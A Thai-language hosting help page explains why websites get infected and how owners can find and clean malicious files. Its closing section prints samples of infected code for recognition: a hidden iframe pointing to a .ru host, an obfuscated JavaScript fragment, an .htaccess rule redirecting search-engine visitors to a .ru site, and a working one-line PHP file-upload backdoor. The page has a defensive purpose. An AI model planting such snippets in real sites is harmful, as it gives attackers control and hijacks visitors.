หน้าเว็บไซต์ติดไวรัส, เว็บไซต์อันตราย, เว็บถูกบล๊อค
สาเหตุของปัญหาเว็บไซต์ติดไวรัส
- กรณีใช้เป็น opensource เช่น joomla, smf board, wordpress, ฯลฯ ไม่มีการ upgrade โปรแกรม หรือ แก้ permission สิทธิของไฟล์ให้เหมาะสม
- กรณีใช้งาน Flash ตัวโปรแกรม flash เองจะมีการใช้งาน script ที่เป็น .js (java) หากไม่มีการ upgrade โปรแกรม flash ก็จะมีช่องโหว่
- กรณีใช้งาน code iframe ควรจะเปลี่ยนไปเป็น code DIV แทน เพื่อปิดช่องโหว่ของ iframe
- กรณีใช้ source free เช่น jquery, code editor, template, module, component, plugin ซึ่งดาวโหลดจากที่อื่นมาใช้งานในเว็บไซต์
และไม่มีการอัพเกรด หรือแก้ permission สิทธิของไฟล์ให้เหมาะสม
วิธีการตรวจสอบไฟล์เว็บไซต์ติดไวรัส
1. ทำการ ดาวโหลดไฟล์จากโฮสติ้ง ลงมาตรวจสอบที่เครื่องคอมพิวเตอร์ ผ่านโปรแกรม FTP วิธีการใช้งาน ftp
2. ให้สังเกตุ วันที่มีการแก้ไขไฟล์เว็บไซต์ล่าสุด โดยที่เราไม่ได้เป็นผู้แก้ไข อาจจะมี script virus แทรกอยู่
3. ให้สังเกตุไฟล์ที่มีชื่อแปลกๆ เช่น .htaccess, 404.php, 1234.php, xx.php, xdfasfsd.html ฯลฯ อาจจะมี script virus แทรกอยู่
4. หากใช้เป็น opensource ให้ทำการอัพเกรด โปรแกรมให้เป็นเวอร์ชั่นใหม่เสมอ เพื่อป้องกันช่องโหว่ของเว็บไซต์
(ควรปิด module, component, plugin ที่ไม่ได้เป็นค่ามาตราฐานที่มาพร้อมกับโปรแกรม opensource ทั้งหมดก่อนทำการอัพเกรด
และ ก่อนการอัพเกรด ต้องทำการสำรองข้อมูลไว้ เพื่อป้องกันกรณีใช้งานไม่ได้)
5. ทำการ ลบข้อมูลเว็บไซต์เดิม ที่อยู่บนโฮสติ้ง ออกทั้งหมด
6. ทำการอัพโหลดข้อมูลขึ้นไปบนโฮสติ้ง อีกครั้ง
7. ทำการแก้สิทธิเจ้าของไฟล์ (permission) ให้เหมาะสม หากเว็บไซต์ไม่ต้องการเปลี่ยนแปลงควรแก้สิทธิเป็น
444 หรือ 555 สำหรับการอ่านข้อมูลอย่างเดียว
8. ทำการสมัคร google webmaster tool สำหรับช่วยตรวจสอบเว็บไซต์
ตัวอย่าง code script virus
ตัวอย่างที่ 1 (ข้อสังเกตุ มักจะพบมาจาก .ru / และถูกซ้อนด้วย tag style="visibility: hidden" )
<iframe src="hxxp://xxx.ru:8080/index.php" width=145 height=199 style="visibility: hidden"></iframe>
ตัวอย่างที่ 2 (ส่วนใหญ่จะอยู่ในไฟล์ .js)
function DOMException(c){Error.apply(this,arguments);this.code=c;var b=["","Index Size Error","DOMString Size Error","
Hierarchy Request Error","Wrong Document Error","Invalid Character Error","No Data Allowed Error","
No Modification Allowed Error","Not Found Error","Not Supported Error","Inuse Attribute Error","Invalid State Error","
Syntax Error","Invalid Modification Error","Namespace Error","Invalid Access Error"];this.message=b[c];
ตัวอย่างที่ 3 (จะอยู่ในไฟล์ .htaccss)
ให้สังเกตุ base64_decode
หรือ มีการทำ rewrite เปลี่ยน ลิงค์เว็บไซต์เราให้ไปที่เว็บไซต์อื่น
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond % ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|
RewriteRule ^(.*)$ lam-siu.ru/indigo?5 [R=301,L] RewriteCond %
ตัวอย่างที่ 4 (จะอยู่ในไฟล์ที่ชื่อแปลกๆ จะมีการเขียน code ให้มีการ upload virus ไปยังเว็บไซต์)
เช่น ไฟล์ 404.php
<?php if (isset($_FILES["elf"]) and ! $_FILES["elf"]["error"] ) {@move_uploaded_file($_FILES["elf"]["tmp_name"], $_FILES["elf"]["name"]) ; echo $ifupload=" ItsOk ";} ?>
